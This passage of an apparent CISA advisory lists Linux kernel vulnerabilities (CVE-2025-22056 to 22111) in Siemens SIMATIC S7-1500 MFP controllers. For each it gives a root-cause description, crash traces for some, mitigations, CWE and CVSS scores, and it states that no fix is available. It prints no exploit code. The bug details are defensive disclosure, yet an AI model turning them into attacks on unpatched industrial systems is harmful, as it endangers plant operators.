<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-22056</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_tunnel: fix geneve_opt type confusion addition When handling multiple NFTA_TUNNEL_KEY_OPTS_GENEVE attributes, the parsing logic should place every geneve_opt structure one by one compactly. Hence, when deciding the next geneve_opt position, the pointer addition should be in units of char *. However, the current implementation erroneously does type conversion before the addition, which will lead to heap out-of-bounds write. [ 6.989857] ================================================================== [ 6.990293] BUG: KASAN: slab-out-of-bounds in nft_tunnel_obj_init+0x977/0xa70 [ 6.990725] Write of size 124 at addr ffff888005f18974 by task poc/178 [ 6.991162] [ 6.991259] CPU: 0 PID: 178 Comm: poc-oob-write Not tainted 6.1.132 #1 [ 6.991655] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 [ 6.992281] Call Trace: [ 6.992423] [ 6.992586] dump_stack_lvl+0x44/0x5c [ 6.992801] print_report+0x184/0x4be [ 6.993790] kasan_report+0xc5/0x100 [ 6.994252] kasan_check_range+0xf3/0x1a0 [ 6.994486] memcpy+0x38/0x60 [ 6.994692] nft_tunnel_obj_init+0x977/0xa70 [ 6.995677] nft_obj_init+0x10c/0x1b0 [ 6.995891] nf_tables_newobj+0x585/0x950 [ 6.996922] nfnetlink_rcv_batch+0xdf9/0x1020 [ 6.998997] nfnetlink_rcv+0x1df/0x220 [ 6.999537] netlink_unicast+0x395/0x530 [ 7.000771] netlink_sendmsg+0x3d0/0x6d0 [ 7.001462] __sock_sendmsg+0x99/0xa0 [ 7.001707] ____sys_sendmsg+0x409/0x450 [ 7.002391] ___sys_sendmsg+0xfd/0x170 [ 7.003145] __sys_sendmsg+0xea/0x170 [ 7.004359] do_syscall_64+0x5e/0x90 [ 7.005817] entry_SYSCALL_64_after_hwframe+0x6e/0xd8 [ 7.006127] RIP: 0033:0x7ec756d4e407 [ 7.006339] Code: 48 89 fa 4c 89 df e8 38 aa 00 00 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 1a 5b c3 0f 1f 84 00 00 00 00 00 48 8b 44 24 10 0f 05 &lt;5b&gt; c3 0f 1f 80 00 00 00 00 83 e2 39 83 faf [ 7.007364] RSP: 002b:00007ffed5d46760 EFLAGS: 00000202 ORIG_RAX: 000000000000002e [ 7.007827] RAX: ffffffffffffffda RBX: 00007ec756cc4740 RCX: 00007ec756d4e407 [ 7.008223] RDX: 0000000000000000 RSI: 00007ffed5d467f0 RDI: 0000000000000003 [ 7.008620] RBP: 00007ffed5d468a0 R08: 0000000000000000 R09: 0000000000000000 [ 7.009039] R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000000 [ 7.009429] R13: 00007ffed5d478b0 R14: 00007ec756ee5000 R15: 00005cbd4e655cb8 Fix this bug with correct pointer addition and conversion in parse and dump code.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-22056">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-22060</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: mvpp2: Prevent parser TCAM memory corruption Protect the parser TCAM/SRAM memory, and the cached (shadow) SRAM information, from concurrent modifications. Both the TCAM and SRAM tables are indirectly accessed by configuring an index register that selects the row to read or write to. This means that operations must be atomic in order to, e.g., avoid spreading writes across multiple rows. Since the shadow SRAM array is used to find free rows in the hardware table, it must also be protected in order to avoid TOCTOU errors where multiple cores allocate the same row. This issue was detected in a situation where `mvpp2_set_rx_mode()` ran concurrently on two CPUs. In this particular case the MVPP2_PE_MAC_UC_PROMISCUOUS entry was corrupted, causing the classifier unit to drop all incoming unicast - indicated by the `rx_classifier_drops` counter.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-22060">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-22083</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: vhost-scsi: Fix handling of multiple calls to vhost_scsi_set_endpoint If vhost_scsi_set_endpoint is called multiple times without a vhost_scsi_clear_endpoint between them, we can hit multiple bugs found by Haoran Zhang: 1. Use-after-free when no tpgs are found: This fixes a use after free that occurs when vhost_scsi_set_endpoint is called more than once and calls after the first call do not find any tpgs to add to the vs_tpg. When vhost_scsi_set_endpoint first finds tpgs to add to the vs_tpg array match=true, so we will do: vhost_vq_set_backend(vq, vs_tpg); ... kfree(vs-&gt;vs_tpg); vs-&gt;vs_tpg = vs_tpg; If vhost_scsi_set_endpoint is called again and no tpgs are found match=false so we skip the vhost_vq_set_backend call leaving the pointer to the vs_tpg we then free via: kfree(vs-&gt;vs_tpg); vs-&gt;vs_tpg = vs_tpg; If a scsi request is then sent we do: vhost_scsi_handle_vq -&gt; vhost_scsi_get_req -&gt; vhost_vq_get_backend which sees the vs_tpg we just did a kfree on. 2. Tpg dir removal hang: This patch fixes an issue where we cannot remove a LIO/target layer tpg (and structs above it like the target) dir due to the refcount dropping to -1. The problem is that if vhost_scsi_set_endpoint detects a tpg is already in the vs-&gt;vs_tpg array or if the tpg has been removed so target_depend_item fails, the undepend goto handler will do target_undepend_item on all tpgs in the vs_tpg array dropping their refcount to 0. At this time vs_tpg contains both the tpgs we have added in the current vhost_scsi_set_endpoint call as well as tpgs we added in previous calls which are also in vs-&gt;vs_tpg. Later, when vhost_scsi_clear_endpoint runs it will do target_undepend_item on all the tpgs in the vs-&gt;vs_tpg which will drop their refcount to -1. Userspace will then not be able to remove the tpg and will hang when it tries to do rmdir on the tpg dir. 3. Tpg leak: This fixes a bug where we can leak tpgs and cause them to be un-removable because the target name is overwritten when vhost_scsi_set_endpoint is called multiple times but with different target names. The bug occurs if a user has called VHOST_SCSI_SET_ENDPOINT and setup a vhost-scsi device to target/tpg mapping, then calls VHOST_SCSI_SET_ENDPOINT again with a new target name that has tpgs we haven't seen before (target1 has tpg1 but target2 has tpg2). When this happens we don't teardown the old target tpg mapping and just overwrite the target name and the vs-&gt;vs_tpg array. Later when we do vhost_scsi_clear_endpoint, we are passed in either target1 or target2's name and we will only match that target's tpgs when we loop over the vs-&gt;vs_tpg. We will then return from the function without doing target_undepend_item on the tpgs. Because of all these bugs, it looks like being able to call vhost_scsi_set_endpoint multiple times was never supported. The major user, QEMU, already has checks to prevent this use case. So to fix the issues, this patch prevents vhost_scsi_set_endpoint from being called if it's already successfully added tpgs. To add, remove or change the tpg config or target name, you must do a vhost_scsi_clear_endpoint first.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-22083">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-22090</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: x86/mm/pat: Fix VM_PAT handling when fork() fails in copy_page_range() If track_pfn_copy() fails, we already added the dst VMA to the maple tree. As fork() fails, we'll cleanup the maple tree, and stumble over the dst VMA for which we neither performed any reservation nor copied any page tables. Consequently untrack_pfn() will see VM_PAT and try obtaining the PAT information from the page table -- which fails because the page table was not copied. The easiest fix would be to simply clear the VM_PAT flag of the dst VMA if track_pfn_copy() fails. However, the whole thing is about "simply" clearing the VM_PAT flag is shaky as well: if we passed track_pfn_copy() and performed a reservation, but copying the page tables fails, we'll simply clear the VM_PAT flag, not properly undoing the reservation ... which is also wrong. So let's fix it properly: set the VM_PAT flag only if the reservation succeeded (leaving it clear initially), and undo the reservation if anything goes wrong while copying the page tables: clearing the VM_PAT flag after undoing the reservation. Note that any copied page table entries will get zapped when the VMA will get removed later, after copy_page_range() succeeded; as VM_PAT is not set then, we won't try cleaning VM_PAT up once more and untrack_pfn() will be happy. Note that leaving these page tables in place without a reservation is not a problem, as we are aborting fork(); this process will never run. A reproducer can trigger this usually at the first try: https://gitlab.com/davidhildenbrand/scratchspace/-/raw/main/reproducers/pat_fork.c WARNING: CPU: 26 PID: 11650 at arch/x86/mm/pat/memtype.c:983 get_pat_info+0xf6/0x110 Modules linked in: ... CPU: 26 UID: 0 PID: 11650 Comm: repro3 Not tainted 6.12.0-rc5+ #92 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014 RIP: 0010:get_pat_info+0xf6/0x110 ... Call Trace: ... untrack_pfn+0x52/0x110 unmap_single_vma+0xa6/0xe0 unmap_vmas+0x105/0x1f0 exit_mmap+0xf6/0x460 __mmput+0x4b/0x120 copy_process+0x1bf6/0x2aa0 kernel_clone+0xab/0x440 __do_sys_clone+0x66/0x90 do_syscall_64+0x95/0x180 Likely this case was missed in: d155df53f310 ("x86/mm/pat: clear VM_PAT if copy_p4d_range failed") ... and instead of undoing the reservation we simply cleared the VM_PAT flag. Keep the documentation of these functions in include/linux/pgtable.h, one place is more than sufficient -- we should clean that up for the other functions like track_pfn_remap/untrack_pfn separately.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-22090">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/459.html">CWE-459 Incomplete Cleanup</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-22095</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: PCI: brcmstb: Fix error path after a call to regulator_bulk_get() If the regulator_bulk_get() returns an error and no regulators are created, we need to set their number to zero. If we don't do this and the PCIe link up fails, a call to the regulator_bulk_free() will result in a kernel panic. While at it, print the error value, as we cannot return an error upwards as the kernel will WARN() on an error from add_bus(). [kwilczynski: commit log, use comma in the message to match style with other similar messages]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-22095">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-22107</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: dsa: sja1105: fix kasan out-of-bounds warning in sja1105_table_delete_entry() There are actually 2 problems: - deleting the last element doesn't require the memmove of elements [i + 1, end) over it. Actually, element i+1 is out of bounds. - The memmove itself should move size - i - 1 elements, because the last element is out of bounds. The out-of-bounds element still remains out of bounds after being accessed, so the problem is only that we touch it, not that it becomes in active use. But I suppose it can lead to issues if the out-of-bounds element is part of an unmapped page.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-22107">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-22111</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: Remove RTNL dance for SIOCBRADDIF and SIOCBRDELIF. SIOCBRDELIF is passed to dev_ioctl() first and later forwarded to br_ioctl_call(), which causes unnecessary RTNL dance and the splat below [0] under RTNL pressure. Let's say Thread A is trying to detach a device from a bridge and Thread B is trying to remove the bridge. In dev_ioctl(), Thread A bumps the bridge device's refcnt by netdev_hold() and releases RTNL because the following br_ioctl_call() also re-acquires RTNL. In the race window, Thread B could acquire RTNL and try to remove the bridge device. Then, rtnl_unlock() by Thread B will release RTNL and wait for netdev_put() by Thread A. Thread A, however, must hold RTNL after the unlock in dev_ifsioc(), which may take long under RTNL pressure, resulting in the splat by Thread B. Thread A (SIOCBRDELIF) Thread B (SIOCBRDELBR) ---------------------- ---------------------- sock_ioctl sock_ioctl `- sock_do_ioctl `- br_ioctl_call `- dev_ioctl `- br_ioctl_stub |- rtnl_lock | |- dev_ifsioc ' ' |- dev = __dev_get_by_name(...) |- netdev_hold(dev, ...) . / |- rtnl_unlock ------. | | |- br_ioctl_call `---&gt; |- rtnl_lock Race | | `- br_ioctl_stub |- br_del_bridge Window | | | |- dev = __dev_get_by_name(...) | | | May take long | `- br_dev_delete(dev, ...) | | | under RTNL pressure | `- unregister_netdevice_queue(dev, ...) | | | | `- rtnl_unlock \ | |- rtnl_lock &lt;-' `- netdev_run_todo | |- ... `- netdev_run_todo | `- rtnl_unlock |- __rtnl_unlock | |- netdev_wait_allrefs_any |- netdev_put(dev, ...) &lt;----------------' Wait refcnt decrement and log splat below To avoid blocking SIOCBRDELBR unnecessarily, let's not call dev_ioctl() for SIOCBRADDIF and SIOCBRDELIF. In the dev_ioctl() path, we do the following: 1. Copy struct ifreq by get_user_ifreq in sock_do_ioctl() 2. Check CAP_NET_ADMIN in dev_ioctl() 3. Call dev_load() in dev_ioctl() 4. Fetch the master dev from ifr.ifr_name in dev_ifsioc() 3. can be done by request_module() in br_ioctl_call(), so we move 1., 2., and 4. to br_ioctl_stub(). Note that 2. is also checked later in add_del_if(), but it's better performed before RTNL. SIOCBRADDIF and SIOCBRDELIF have been processed in dev_ioctl() since the pre-git era, and there seems to be no specific reason to process them there. [0]: unregister_netdevice: waiting for wpan3 to become free. Usage count = 2 ref_tracker: wpan3@ffff8880662d8608 has 1/1 users at __netdev_tracker_alloc include/linux/netdevice.h:4282 [inline] netdev_hold include/linux/netdevice.h:4311 [inline] dev_ifsioc+0xc6a/0x1160 net/core/dev_ioctl.c:624 dev_ioctl+0x255/0x10c0 net/core/dev_ioctl.c:826 sock_do_ioctl+0x1ca/0x260 net/socket.c:1213 sock_ioctl+0x23a/0x6c0 net/socket.c:1318 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:906 [inline] __se_sys_ioctl fs/ioctl.c:892 [inline] __x64_sys_ioctl+0x1a4/0x210 fs/ioctl.c:892 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcb/0x250 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-22111">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
